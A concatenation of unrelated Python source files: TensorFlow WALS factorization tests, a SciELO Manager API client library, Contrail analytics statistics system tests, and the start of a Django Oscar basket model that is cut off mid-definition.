# Shard 1.
[[1.18160152, 1.52490723, -0.50015002],
[1.82574749, -0.57515913, -1.32810032]],
# Shard 2.
[[-0.15515432, -0.84675711, 0.13097958],
[-0.9246484, 0.69117504, 1.2036494]],
]
self._row_weights = [[0.1, 0.2, 0.3], [0.4, 0.5]]
self._col_weights = [[0.1, 0.2, 0.3], [0.4, 0.5], [0.6, 0.7]]
# Values of row and column factors after running one iteration or factor
# updates.
self._row_factors_0 = [[0.097689, -0.219293, -0.020780],
[0.50842, 0.64626, 0.22364],
[0.401159, -0.046558, -0.192854]]
self._row_factors_1 = [[1.20597, -0.48025, 0.35582],
[1.5564, 1.2528, 1.0528]]
self._col_factors_0 = [[2.4725, -1.2950, -1.9980],
[0.44625, 1.50771, 1.27118],
[1.39801, -2.10134, 0.73572]]
self._col_factors_1 = [[3.36509, -0.66595, -3.51208],
[0.57191, 1.59407, 1.33020]]
self._col_factors_2 = [[3.3459, -1.3341, -3.3008],
[0.57366, 1.83729, 1.26798]]
self._model = wals_lib.WALSMatrixFactorization(
self._num_rows,
self._num_cols,
self._embedding_dimension,
self._unobserved_weight,
col_init=self._col_init,
regularization_coeff=self._regularization_coeff,
num_row_shards=self._num_row_shards,
num_col_shards=self._num_col_shards,
row_weights=self._row_weights,
col_weights=self._col_weights,
max_sweeps=self.max_sweeps,
use_factors_weights_cache_for_training=self.use_cache,
use_gramian_cache_for_training=self.use_cache)
def test_fit(self):
# Row sweep.
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True)[0]
self._model.fit(input_fn=input_fn, steps=self.row_steps)
row_factors = self._model.get_row_factors()
self.assertAllClose(row_factors[0], self._row_factors_0, atol=1e-3)
self.assertAllClose(row_factors[1], self._row_factors_1, atol=1e-3)
# Col sweep.
# Running fit a second time will resume training from the checkpoint.
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True)[0]
self._model.fit(input_fn=input_fn, steps=self.col_steps)
col_factors = self._model.get_col_factors()
self.assertAllClose(col_factors[0], self._col_factors_0, atol=1e-3)
self.assertAllClose(col_factors[1], self._col_factors_1, atol=1e-3)
self.assertAllClose(col_factors[2], self._col_factors_2, atol=1e-3)
def test_predict(self):
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True,
)[0]
# Project rows 1 and 4 from the input matrix.
proj_input_fn = self.input_fn(
np_matrix=self.INPUT_MATRIX[[1, 4], :],
batch_size=2,
mode=model_fn.ModeKeys.INFER,
project_row=True,
projection_weights=[[0.2, 0.5]])[0]
self._model.fit(input_fn=input_fn, steps=self.row_steps)
projections = self._model.get_projections(proj_input_fn)
projected_rows = list(itertools.islice(projections, 2))
self.assertAllClose(
projected_rows,
[self._row_factors_0[1], self._row_factors_1[1]],
atol=1e-3)
# Project columns 5, 3, 1 from the input matrix.
proj_input_fn = self.input_fn(
np_matrix=self.INPUT_MATRIX[:, [5, 3, 1]],
batch_size=3,
mode=model_fn.ModeKeys.INFER,
project_row=False,
projection_weights=[[0.6, 0.4, 0.2]])[0]
self._model.fit(input_fn=input_fn, steps=self.col_steps)
projections = self._model.get_projections(proj_input_fn)
projected_cols = list(itertools.islice(projections, 3))
self.assertAllClose(
projected_cols,
[self._col_factors_2[0], self._col_factors_1[0],
self._col_factors_0[1]],
atol=1e-3)
def test_eval(self):
# Do a row sweep then evaluate the model on row inputs.
# The evaluate function returns the loss of the projected rows, but since
# projection is idempotent, the eval loss must match the model loss.
input_fn = self.input_fn(np_matrix=self.input_matrix,
batch_size=self.batch_size,
mode=model_fn.ModeKeys.TRAIN,
remove_empty_rows_columns=True,
)[0]
self._model.fit(input_fn=input_fn, steps=self.row_steps)
eval_input_fn_row = self.input_fn(np_matrix=self.input_matrix,
batch_size=1,
mode=model_fn.ModeKeys.EVAL,
project_row=True,
remove_empty_rows_columns=True)[0]
loss = self._model.evaluate(
input_fn=eval_input_fn_row, steps=self._num_rows)['loss']
with self.cached_session():
true_loss = self.calculate_loss()
self.assertNear(
loss, true_loss, err=.001,
msg="""After row update, eval loss = {}, does not match the true
loss = {}.""".format(loss, true_loss))
# Do a col sweep then evaluate the model on col inputs.
self._model.fit(input_fn=input_fn, steps=self.col_steps)
eval_input_fn_col = self.input_fn(np_matrix=self.input_matrix,
batch_size=1,
mode=model_fn.ModeKeys.EVAL,
project_row=False,
remove_empty_rows_columns=True)[0]
loss = self._model.evaluate(
input_fn=eval_input_fn_col, steps=self._num_cols)['loss']
with self.cached_session():
true_loss = self.calculate_loss()
self.assertNear(
loss, true_loss, err=.001,
msg="""After col update, eval loss = {}, does not match the true
loss = {}.""".format(loss, true_loss))
class WALSMatrixFactorizationTestSweeps(WALSMatrixFactorizationTest):
@property
def max_sweeps(self):
return 2
# We set the column steps to None so that we rely only on max_sweeps to stop
# training.
@property
def col_steps(self):
return None
class WALSMatrixFactorizationTestCached(WALSMatrixFactorizationTest):
@property
def use_cache(self):
return True
class WALSMatrixFactorizaiontTestPaddedInput(WALSMatrixFactorizationTest):
PADDED_INPUT_MATRIX = np.pad(
WALSMatrixFactorizationTest.INPUT_MATRIX,
[(1, 0), (1, 0)], mode='constant')
@property
def input_matrix(self):
return self.PADDED_INPUT_MATRIX
class WALSMatrixFactorizationUnsupportedTest(test.TestCase):
def setUp(self):
pass
def testDistributedWALSUnsupported(self):
tf_config = {
'cluster': {
run_config_lib.TaskType.PS: ['host1:1', 'host2:2'],
run_config_lib.TaskType.WORKER: ['host3:3', 'host4:4']
},
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
self.assertEqual(config.num_worker_replicas, 2)
with self.assertRaises(ValueError):
self._model = wals_lib.WALSMatrixFactorization(1, 1, 1, config=config)
class SweepHookTest(test.TestCase):
def test_sweeps(self):
is_row_sweep_var = variables.Variable(True)
is_sweep_done_var = variables.Variable(False)
init_done = variables.Variable(False)
row_prep_done = variables.Variable(False)
col_prep_done = variables.Variable(False)
row_train_done = variables.Variable(False)
col_train_done = variables.Variable(False)
init_op = state_ops.assign(init_done, True)
row_prep_op = state_ops.assign(row_prep_done, True)
col_prep_op = state_ops.assign(col_prep_done, True)
row_train_op = state_ops.assign(row_train_done, True)
col_train_op = state_ops.assign(col_train_done, True)
train_op = control_flow_ops.no_op()
switch_op = control_flow_ops.group(
state_ops.assign(is_sweep_done_var, False),
state_ops.assign(is_row_sweep_var,
math_ops.logical_not(is_row_sweep_var)))
mark_sweep_done = state_ops.assign(is_sweep_done_var, True)
with self.cached_session() as sess:
sweep_hook = wals_lib._SweepHook(
is_row_sweep_var,
is_sweep_done_var,
init_op,
[row_prep_op],
[col_prep_op],
row_train_op,
col_train_op,
switch_op)
mon_sess = monitored_session._HookedSession(sess, [sweep_hook])
sess.run([variables.global_variables_initializer()])
# Row sweep.
mon_sess.run(train_op)
self.assertTrue(sess.run(init_done),
msg='init op not run by the Sweephook')
self.assertTrue(sess.run(row_prep_done),
msg='row_prep_op not run by the SweepHook')
self.assertTrue(sess.run(row_train_done),
msg='row_train_op not run by the SweepHook')
self.assertTrue(
sess.run(is_row_sweep_var),
msg='Row sweep is not complete but is_row_sweep_var is False.')
# Col sweep.
mon_sess.run(mark_sweep_done)
mon_sess.run(train_op)
self.assertTrue(sess.run(col_prep_done),
msg='col_prep_op not run by the SweepHook')
self.assertTrue(sess.run(col_train_done),
msg='col_train_op not run by the SweepHook')
self.assertFalse(
sess.run(is_row_sweep_var),
msg='Col sweep is not complete but is_row_sweep_var is True.')
# Row sweep.
mon_sess.run(mark_sweep_done)
mon_sess.run(train_op)
self.assertTrue(
sess.run(is_row_sweep_var),
msg='Col sweep is complete but is_row_sweep_var is False.')
class StopAtSweepHookTest(test.TestCase):
def test_stop(self):
hook = wals_lib._StopAtSweepHook(last_sweep=10)
completed_sweeps = variables.Variable(
8, name=wals_lib.WALSMatrixFactorization.COMPLETED_SWEEPS)
train_op = state_ops.assign_add(completed_sweeps, 1)
hook.begin()
with self.cached_session() as sess:
sess.run([variables.global_variables_initializer()])
mon_sess = monitored_session._HookedSession(sess, [hook])
mon_sess.run(train_op)
# completed_sweeps is 9 after running train_op.
self.assertFalse(mon_sess.should_stop())
mon_sess.run(train_op)
# completed_sweeps is 10 after running train_op.
self.assertTrue(mon_sess.should_stop())
if __name__ == '__main__':
test.main()
| |
# coding: utf-8
import re
import logging
import time
import functools
from . import httpbroker
from . import exceptions
logger = logging.getLogger(__name__)
ITEMS_PER_REQUEST = 50
API_VERSIONS = ('v1',)
RESOURCE_PATH_PATTERN = re.compile(r'/api/(\w+)/(\w+)/(\d+)/')
class Connector(object):
"""
Encapsulates the HTTP requests layer.
:param username: valid username that has access to manager.scielo.org.
:param api_key: its respective api key.
:param api_uri: (optional) if connecting to a non official instance of `SciELO Manager <https://github.com/scieloorg/SciELO-Manager>`_
:param version: (optional) by default the newest version is used.
:param http_broker: (optional) a module to deal with http stuff. The reference API is implemented at :mod:`scieloapi.httpbroker`.
:param check_ca: (optional) if certification authority should be checked during ssl sessions. Defaults to `False`.
"""
# caches endpoints definitions
_cache = {}
def __init__(self, username, api_key, api_uri=None,
version=None, http_broker=None, check_ca=False):
# dependencies
self._time = time
if http_broker:
_httpbroker = http_broker
else:
_httpbroker = httpbroker # module
# setup
self.check_ca = check_ca
self.api_uri = api_uri if api_uri else r'http://manager.scielo.org/api/'
if version :
if version in API_VERSIONS:
self.version = version
else:
raise ValueError('unsupported api version. supported are: %s' % ', '.join(API_VERSIONS))
else:
self.version = sorted(API_VERSIONS)[-1]
self.username = username
self.api_uri = self.api_uri + self.version + '/'
# dynamic http methods creation
self._create_http_methods(_httpbroker, username, api_key)
def _create_http_methods(self, broker, username, api_key):
"""
Dynamically adds http methods bound to user credentials.
:param broker: reference to the module to be used as http broker.
:param username: valid username that has access to manager.scielo.org.
:param api_key: its respective api key.
"""
bound_get = functools.partial(broker.get, auth=(username, api_key),
check_ca=self.check_ca)
bound_post = functools.partial(broker.post, auth=(username, api_key),
check_ca=self.check_ca)
setattr(self, '_http_get', bound_get)
setattr(self, '_http_post', bound_post)
def fetch_data(self, endpoint,
resource_id=None,
**kwargs):
"""
Fetches the specified resource from the SciELO Manager API.
:param endpoint: a valid endpoint at http://manager.scielo.org/api/v1/
:param resource_id: (optional) an int representing the document.
:param \*\*kwargs: (optional) params to be passed as query string.
"""
err_count = 0
while True:
try:
response = self._http_get(self.api_uri,
endpoint=endpoint,
resource_id=resource_id,
params=kwargs)
except (exceptions.ConnectionError, exceptions.ServiceUnavailable) as e:
if err_count < 10:
wait_secs = err_count * 5
logger.info('%s. Waiting %ss to retry.' % (e, wait_secs))
self._time.sleep(wait_secs)
err_count += 1
continue
else:
logger.error('%s. Unable to connect to resource.' % e)
raise
else:
# restart error count
err_count = 0
return response
def iter_docs(self, endpoint, **kwargs):
"""
Iterates over all documents of a given endpoint and collection.
:param endpoint: must be a valid endpoint at http://manager.scielo.org/api/v1/
:param \*\*kwargs: are passed thru the request as query string params
Note that you need a valid API KEY in order to query the
Manager API. Read more at: http://ref.scielo.org/ddkpmx
"""
offset = 0
limit = ITEMS_PER_REQUEST
qry_params = {'limit': limit}
qry_params.update(kwargs)
while True:
qry_params.update({'offset': offset})
doc = self.fetch_data(endpoint, **qry_params)
for obj in doc['objects']:
# we are interested only in non-trashed items.
if obj.get('is_trashed'):
continue
yield obj
if not doc['meta']['next']:
raise StopIteration()
else:
offset += ITEMS_PER_REQUEST
def get_endpoints(self):
"""
Get all endpoints available for the given API version.
"""
cls = self.__class__
if self.version not in cls._cache:
cls._cache[self.version] = self._http_get(self.api_uri)
return cls._cache[self.version]
def post_data(self, endpoint, data):
"""
Creates a new resource at `endpoint` with `data`.
:param endpoint: must be a valid endpoint at http://manager.scielo.org/api/v1/
:param data: json serializable Python datastructures.
:returns: created resource url.
"""
return self._http_post(self.api_uri, data, endpoint=endpoint)
class Endpoint(object):
"""
Represents an API endpoint.
:param name: the endpoint name.
:param connector: instance of :class:`Connector`.
"""
def __init__(self, name, connector):
self.name = name
self.connector = connector
def get(self, resource_id):
"""
Gets a specific document of the endpoint.
:param resource_id: an int representing the document.
"""
res = self.connector.fetch_data(self.name, resource_id=resource_id)
return res
def all(self):
"""
Gets all documents of the endpoint.
"""
return self.connector.iter_docs(self.name)
def filter(self, **kwargs):
"""
Gets all documents of the endpoint that satisfies some criteria.
:param \*\*kwargs: filtering criteria as documented at `docs.scielo.org <http://ref.scielo.org/ph6gvk>`_
"""
return self.connector.iter_docs(self.name, **kwargs)
def post(self, data):
"""
Creates a new resource
:param data: serializable python data structures.
:returns: id of the new resource.
"""
resp = self.connector.post_data(self.name, data)
match = RESOURCE_PATH_PATTERN.search(resp)
if match:
match_group = match.groups()
return match_group[2]
else:
raise exceptions.APIError('Unknown url: %s' % resp)
class Client(object):
"""
Collection of :class:`Endpoint` made available in an object oriented fashion.
An instance of Client tries to figure out the available endpoints
for the version of the API the Client is instantiated for, and
automatically instantiates :class:`Endpoint` for each one.
If ``version`` is missing, the newest available will be used.
:param username: valid username that has access to manager.scielo.org.
:param api_key: its respective api key.
:param api_uri: (optional) if connecting to a non official instance of `SciELO Manager <https://github.com/scieloorg/SciELO-Manager>`_
:param version: (optional) by default the newest version is used.
:param check_ca: (optional) if certification authority should be checked during ssl sessions. Defaults to `False`.
Usage::
>>> import scieloapi
>>> cli = scieloapi.Client('some.user', 'some.apikey')
<scieloapi.scieloapi.Client object at 0x10726f9d0>
>>> cli.query('journals').all()
<generator object iter_docs at 0x10fd59730>
"""
def __init__(self, username, api_key, api_uri=None,
version=None, connector_dep=Connector, check_ca=False):
self._connector = connector_dep(username,
api_key,
api_uri=api_uri,
version=version,
check_ca=check_ca)
self._endpoints = {}
for ep in self._introspect_endpoints():
self._endpoints[ep] = Endpoint(ep, self._connector)
def _introspect_endpoints(self):
"""
Contact the API server to discover the available endpoints.
"""
return self._connector.get_endpoints().keys()
def __getattr__(self, name):
"""
Missing attributes are assumed to be endpoint lookups.
i.e. Client.journals.all()
"""
if name in self._endpoints:
logger.warning('DEPRECATION WARNING! Use the `query` method for endpoint lookups.')
return self._endpoints[name]
else:
raise AttributeError()
@property
def endpoints(self):
"""
Lists all available endpoints for the api version
the instance of :class:`Client` was created to interact.
"""
return self._endpoints.keys()
@property
def version(self):
"""
The API version the Client instance is interfacing with.
"""
return self._connector.version
def fetch_relations(self, dataset, only=None):
"""
Fetches all records that relates to `dataset`.
Its important to note that only first-level relations will be fetched
in order to avoid massive data retrieval.
:param dataset: datastructure representing a record. Tipically a `dict` instance.
:param only: (optional) a collection of relations to fetch. By default, all relations are retrieved.
Usage::
>>> import scieloapi
>>> cli = scieloapi.Client('some.user', 'some.apikey')
>>> cli.fetch_relations(cli.journals.get(70))
"""
new_dataset = {}
for attr_name, attr_value in dataset.items():
# skip fetching itself and undesired fields
if attr_name == 'resource_uri' or (only and attr_name not in only):
new_dataset[attr_name] = attr_value
elif isinstance(attr_value, basestring):
try:
new_dataset[attr_name] = self.get(attr_value)
except ValueError as e:
new_dataset[attr_name] = attr_value
elif isinstance(attr_value, list):
new_elems = []
for elem in attr_value:
try:
new_elems.append(self.get(elem))
except (TypeError, ValueError) as e:
new_elems.append(elem)
new_dataset[attr_name] = new_elems
else:
new_dataset[attr_name] = attr_value
return new_dataset
def get(self, resource_uri):
"""
Gets resource_uri.
Gets the given resource in a opinionated fashion in terms of the
`version` passed during client's instantiation. The `endpoint` must also
be available for the version the client is bound to.
:param resource_uri: text string in the form `/api/<version>/<endpoint>/<resource_id>/`.
"""
match = RESOURCE_PATH_PATTERN.match(resource_uri)
if match:
version, endpoint, resource_id = match.groups()
if version != self.version:
raise ValueError('Resource and Client version must match')
return self.query(endpoint).get(resource_id)
else:
raise ValueError('Invalid resource_uri')
def query(self, endpoint):
"""
Query an endpoint.
:param endpoint: string of the endpoint's name. A complete list of
valid endpoints can be got at :attr:`Client.endpoints`.
"""
if endpoint in self._endpoints:
return self._endpoints[endpoint]
else:
raise ValueError('Unknown endpoint %s.' % endpoint)
| |
#!/usr/bin/env python
#
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
#
# analytics_stattest.py
#
# System tests for analytics
#
import os
import sys
import threading
threading._DummyThread._Thread__stop = lambda x: 42
import signal
import gevent
from gevent import monkey
monkey.patch_all()
import os
import unittest
import testtools
import fixtures
import socket
from utils.analytics_fixture import AnalyticsFixture
from utils.stats_fixture import StatsFixture
from mockcassandra import mockcassandra
from mockredis import mockredis
import logging
import time
import pycassa
from pycassa.pool import ConnectionPool
from pycassa.columnfamily import ColumnFamily
from opserver.sandesh.viz.constants import *
from utils.opserver_introspect_utils import VerificationOpsSrv
from utils.util import retry, find_buildroot, redis_path
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
builddir = find_buildroot(os.getcwd())
class StatsTest(testtools.TestCase, fixtures.TestWithFixtures):
@classmethod
def setUpClass(cls):
if StatsTest._check_skip_test() is True:
return
if (os.getenv('LD_LIBRARY_PATH', '').find('build/lib') < 0):
if (os.getenv('DYLD_LIBRARY_PATH', '').find('build/lib') < 0):
assert(False)
cls.cassandra_port = StatsTest.get_free_port()
mockcassandra.start_cassandra(cls.cassandra_port)
cls.redis_port = StatsTest.get_free_port()
mockredis.start_redis(
cls.redis_port, redis_path())
@classmethod
def tearDownClass(cls):
if StatsTest._check_skip_test() is True:
return
mockcassandra.stop_cassandra(cls.cassandra_port)
mockredis.stop_redis(cls.redis_port)
pass
#@unittest.skip('Get samples using StatsOracle')
def test_00_basicsamples(self):
'''
This test starts redis,vizd,opserver and qed
It uses the test class' cassandra instance
Then it sends test stats to the collector
and checks if they can be accessed from QE.
'''
logging.info("*** test_00_basicsamples ***")
if StatsTest._check_skip_test() is True:
return True
vizd_obj = self.useFixture(
AnalyticsFixture(logging, builddir,
self.__class__.redis_port,
self.__class__.cassandra_port))
assert vizd_obj.verify_on_setup()
assert vizd_obj.verify_collector_obj_count()
collectors = [vizd_obj.get_collector()]
generator_obj = self.useFixture(
StatsFixture("VRouterAgent", collectors,
logging, vizd_obj.get_opserver_port()))
assert generator_obj.verify_on_setup()
logging.info("Starting stat gen " + str(UTCTimestampUsec()))
generator_obj.send_test_stat_dynamic("t00","samp1",1,1);
generator_obj.send_test_stat_dynamic("t00","samp2",2,1.1);
generator_obj.send_test_stat_dynamic("t00&t01","samp1&samp2",2,1.1);
generator_obj.send_test_stat_dynamic("t00>t01>","samp1&samp2",2,1.1,
"&test_s2>");
logging.info("Checking Stats " + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
"-2m", select_fields = [ "UUID", "ts.s1", "ts.i1", "ts.d1" ],
where_clause = 'name="t00"', num = 2, check_rows =
[{ "ts.s1":"samp2", "ts.i1":2, "ts.d1":1.1},
{ "ts.s1":"samp1", "ts.i1":1, "ts.d1":1}]);
assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
"-2m", select_fields = [ "UUID", "ts.s1", "ts.s2" ],
where_clause = 'name="t00&t01"', num = 1, check_rows =
[{ "ts.s1":"samp1&samp2", "ts.s2": "" }])
assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
"-2m", select_fields = [ "UUID", "name", "ts.s2" ],
where_clause = 'ts.s1="samp1&samp2"', num = 2, check_rows =
[{ "name":"t00&t01", "ts.s2": "" },
{ "name":"t00>t01>", "ts.s2":"&test_s2>" }])
return True
# end test_00_basicsamples
#@unittest.skip('Get samples using StatsOracle')
def test_01_statprefix(self):
'''
This test starts redis,vizd,opserver and qed
It uses the test class' cassandra instance
Then it sends test stats to the collector
and checks if they can be accessed from QE, using prefix-suffix indexes
'''
logging.info("*** test_01_statprefix ***")
if StatsTest._check_skip_test() is True:
return True
vizd_obj = self.useFixture(
AnalyticsFixture(logging, builddir,
self.__class__.redis_port,
self.__class__.cassandra_port))
assert vizd_obj.verify_on_setup()
assert vizd_obj.verify_collector_obj_count()
collectors = [vizd_obj.get_collector()]
generator_obj = self.useFixture(
StatsFixture("VRouterAgent", collectors,
logging, vizd_obj.get_opserver_port()))
assert generator_obj.verify_on_setup()
logging.info("Starting stat gen " + str(UTCTimestampUsec()))
generator_obj.send_test_stat("t010","lxxx","samp1",1,1);
generator_obj.send_test_stat("t010","lyyy","samp1",2,2);
generator_obj.send_test_stat("t010","lyyy","samp3",2,2,"",5);
generator_obj.send_test_stat("t010","lyyy&","samp3>",2,2,"");
generator_obj.send_test_stat("t011","lyyy","samp2",1,1.1,"",7);
generator_obj.send_test_stat("t011","lxxx","samp2",2,1.2);
generator_obj.send_test_stat("t011","lxxx","samp2",2,1.2,"",9);
generator_obj.send_test_stat("t010&t011","lxxx","samp2",1,1.4);
generator_obj.send_test_stat("t010&t011","lx>ly","samp2",1,1.4);
logging.info("Checking Stats str-str " + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
select_fields = [ "UUID", "st.s1", "st.i1", "st.d1" ],
where_clause = 'name|st.s1=t010|samp1', num = 2, check_rows =
[{ "st.s1":"samp1", "st.i1":2, "st.d1":2},
{ "st.s1":"samp1", "st.i1":1, "st.d1":1}]);
assert generator_obj.verify_test_stat("StatTable.StatTestState.st",
"-2m", select_fields = [ "UUID", "l1" ], where_clause =
'name|st.s1=t010&t011|samp2 OR name|st.s1=t010|samp3>',
num = 3, check_rows = [{ "l1":"lxxx" }, { "l1":"lx>ly" },
{ "l1":"lyyy&" }])
assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
select_fields = [ "UUID", "st.s1", "st.i1", "st.d1" ],
where_clause = 'st.i1|st.i2=2|1<6', num = 1, check_rows =
[{ "st.s1":"samp3", "st.i1":2, "st.d1":2}]);
logging.info("Checking CLASS " + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
select_fields = [ "T", "name", "l1", "CLASS(T)" ],
where_clause = 'name=*', num = 9, check_uniq =
{ "CLASS(T)":7 })
return True
# end test_01_statprefix
#@unittest.skip('Get samples using StatsOracle')
def test_02_overflowsamples(self):
'''
This test starts redis,vizd,opserver and qed
It uses the test class' cassandra instance
Then it sends test stats to the collector
and checks if they can be accessed from QE.
'''
logging.info("*** test_02_overflowsamples ***")
if StatsTest._check_skip_test() is True:
return True
vizd_obj = self.useFixture(
AnalyticsFixture(logging, builddir,
self.__class__.redis_port,
self.__class__.cassandra_port))
assert vizd_obj.verify_on_setup()
assert vizd_obj.verify_collector_obj_count()
collectors = [vizd_obj.get_collector()]
generator_obj = self.useFixture(
StatsFixture("VRouterAgent", collectors,
logging, vizd_obj.get_opserver_port()))
assert generator_obj.verify_on_setup()
logging.info("Starting stat gen " + str(UTCTimestampUsec()))
generator_obj.send_test_stat_dynamic("t02","samp02-2",0xffffffffffffffff,1.1);
logging.info("Checking Stats " + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.TestStateDynamic.ts",
"-2m", select_fields = [ "UUID", "ts.s1", "ts.i1", "ts.d1" ],
where_clause = 'name="t02"', num = 1, check_rows =
[{"ts.s1":"samp02-2", "ts.i1":0xffffffffffffffff, "ts.d1":1.1}])
return True
# end test_02_overflowsamples
#@unittest.skip('Get minmax values from inserted stats')
def test_03_min_max_query(self):
'''
This test starts redis,vizd,opserver and qed
It uses the test class' cassandra instance
Then it inserts into the stat table rows
and queries MAX and MIN on them
'''
logging.info("*** test_03_min_max_query ***")
if StatsTest._check_skip_test() is True:
return True
vizd_obj = self.useFixture(
AnalyticsFixture(logging, builddir,
self.__class__.redis_port,
self.__class__.cassandra_port))
assert vizd_obj.verify_on_setup()
assert vizd_obj.verify_collector_obj_count()
collectors = [vizd_obj.get_collector()]
generator_obj = self.useFixture(
StatsFixture("VRouterAgent", collectors,
logging, vizd_obj.get_opserver_port()))
assert generator_obj.verify_on_setup()
logging.info("Starting stat gen " + str(UTCTimestampUsec()))
generator_obj.send_test_stat("t04","lxxx","samp1",1,5);
generator_obj.send_test_stat("t04","lyyy","samp1",4,3.4);
generator_obj.send_test_stat("t04","lyyy","samp1",2,4,"",5);
logging.info("Checking Stats " + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
select_fields = [ "MAX(st.i1)"],
where_clause = 'name|st.s1=t04|samp1', num = 1, check_rows =
[{u'MAX(st.i1)': 4}]);
assert generator_obj.verify_test_stat("StatTable.StatTestState.st","-2m",
select_fields = [ "MIN(st.d1)"],
where_clause = 'name|st.s1=t04|samp1', num = 1, check_rows =
[{u'MIN(st.d1)': 3.4}]);
return True
# end test_03_min_max_query
#@unittest.skip('Get samples from objectlog stats')
def test_04_statprefix_obj(self):
'''
This test starts redis,vizd,opserver and qed
It uses the test class' cassandra instance
Then it sends test object stats to the collector
and checks if they can be accessed from QE, using prefix-suffix indexes
'''
logging.info("*** test_04_statprefix_obj ***")
if StatsTest._check_skip_test() is True:
return True
vizd_obj = self.useFixture(
AnalyticsFixture(logging, builddir,
self.__class__.redis_port,
self.__class__.cassandra_port))
assert vizd_obj.verify_on_setup()
assert vizd_obj.verify_collector_obj_count()
collectors = [vizd_obj.get_collector()]
generator_obj = self.useFixture(
StatsFixture("VRouterAgent", collectors,
logging, vizd_obj.get_opserver_port()))
assert generator_obj.verify_on_setup()
logging.info("Starting stat gen " + str(UTCTimestampUsec()))
generator_obj.send_test_obj_stat("t010","lxxx","samp1",1,1);
generator_obj.send_test_obj_stat("t010","lyyy","samp1",2,2);
generator_obj.send_test_obj_stat("t010","lyyy","samp3",2,2,"",5);
generator_obj.send_test_obj_stat("t011","lyyy","samp2",1,1.1,"",7);
generator_obj.send_test_obj_stat("t011","lxxx","samp2",2,1.2);
generator_obj.send_test_obj_stat("t011","lxxx","samp2",2,1.2,"",9);
logging.info("Checking Objectlog Stats str-str " + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.StatTestObj.st","-2m",
select_fields = [ "UUID", "st.s1", "st.i1", "st.d1" ],
where_clause = 'name|st.s1=t010|samp1', num = 2, check_rows =
[{ "st.s1":"samp1", "st.i1":2, "st.d1":2},
{ "st.s1":"samp1", "st.i1":1, "st.d1":1}]);
return True
# end test_04_statprefix_obj
#@unittest.skip('Send stats with 2nd level of hierarchy')
def test_05_statprefix_double(self):
'''
This test starts redis,vizd,opserver and qed
It uses the test class' cassandra instance
Then it sends test 2nd-level stats to the collector
and checks if they can be accessed from QE, using prefix-suffix indexes
'''
logging.info("*** test_05_statprefix_double ***")
if StatsTest._check_skip_test() is True:
return True
vizd_obj = self.useFixture(
AnalyticsFixture(logging, builddir,
self.__class__.redis_port,
self.__class__.cassandra_port))
assert vizd_obj.verify_on_setup()
assert vizd_obj.verify_collector_obj_count()
collectors = [vizd_obj.get_collector()]
generator_obj = self.useFixture(
StatsFixture("VRouterAgent", collectors,
logging, vizd_obj.get_opserver_port()))
assert generator_obj.verify_on_setup()
logging.info("Starting stat gen " + str(UTCTimestampUsec()))
generator_obj.send_test_stat_double("t010","lxxx","samp1",1,1);
generator_obj.send_test_stat_double("t010","lyyy","samp1",2,3);
generator_obj.send_test_stat_double("t010","lyyy","samp3",2,3,"misc2",5);
generator_obj.send_test_stat_double("t011","lyyy","samp2",1,1.1,"misc1",7);
generator_obj.send_test_stat_double("t011","lxxx","samp2",2,1.2);
generator_obj.send_test_stat_double("t011","lxxx","samp2",2,1.2,"",9);
logging.info("Checking 2nd-level Stats str-double" + str(UTCTimestampUsec()))
assert generator_obj.verify_test_stat("StatTable.StatTestStateDouble.dst.st","-2m",
select_fields = [ "UUID", "dst.st.s1", "dst.st.i1", "dst.l1" ],
where_clause = 'dst.l1|dst.st.s2=lyyy|misc1', num = 1, check_rows =
[{ "dst.st.s1":"samp2", "dst.st.i1":1, "dst.l1":"lyyy"}]);
return True
# end test_05_statprefix_double
@staticmethod
def get_free_port():
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.bind(("", 0))
cport = cs.getsockname()[1]
cs.close()
return cport
@staticmethod
def _check_skip_test():
if (socket.gethostname() == 'build01'):
logging.info("Skipping test")
return True
return False
def _term_handler(*_):
raise IntSignal()
if __name__ == '__main__':
gevent.signal(signal.SIGINT,_term_handler)
unittest.main(catchbreak=True)
| |
from decimal import Decimal as D
import zlib
from django.db import models
from django.db.models import Sum
from django.conf import settings
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from oscar.apps.basket.managers import OpenBasketManager, SavedBasketManager
from oscar.apps.offer import results
from oscar.core.compat import AUTH_USER_MODEL
from oscar.templatetags.currency_filters import currency
class AbstractBasket(models.Model):
"""
Basket object
"""
# Baskets can be anonymously owned - hence this field is nullable. When a
# anon user signs in, their two baskets are merged.
owner = models.ForeignKey(
AUTH_USER_MODEL, related_name='baskets', null=True,
verbose_name=_("Owner"))
# Basket statuses
# - Frozen is for when a basket is in the process of being submitted
# and we need to prevent any changes to it.
OPEN, MERGED, SAVED, FROZEN, SUBMITTED = (
"Open", "Merged", "Saved", "Frozen", "Submitted")
STATUS_CHOICES = (
(OPEN, _("Open - currently active")),
(MERGED, _("Merged - superceded by another basket")),
(SAVED, _("Saved - for items to be purchased later")),
(FROZEN, _("Frozen - the basket cannot be modified")),
(SUBMITTED, _("Submitted - has been ordered at the checkout")),
)
status = models.CharField(
